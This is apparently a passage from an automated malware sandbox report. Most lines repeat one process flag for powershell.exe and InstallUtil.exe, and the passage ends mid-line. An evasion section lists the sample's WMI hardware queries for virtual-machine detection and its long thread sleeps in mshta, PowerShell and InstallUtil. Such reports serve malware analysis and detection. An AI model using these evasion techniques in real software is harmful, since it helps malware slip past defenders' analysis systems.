                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\mshta.exe TID: 4000Thread sleep time: -1140000s >= -30000s
                Source: C:\Windows\System32\mshta.exe TID: 4000Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124Thread sleep time: -5160000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2392Thread sleep time: -38000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\mshta.exe TID: 2248Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -2220000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 2760Thread sleep time: -360000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -54812s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -37908s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -37106s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -36906s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -35504s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -35304s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -35104s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -34302s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -33902s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776Thread sleep time: -32900s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe TID: 1776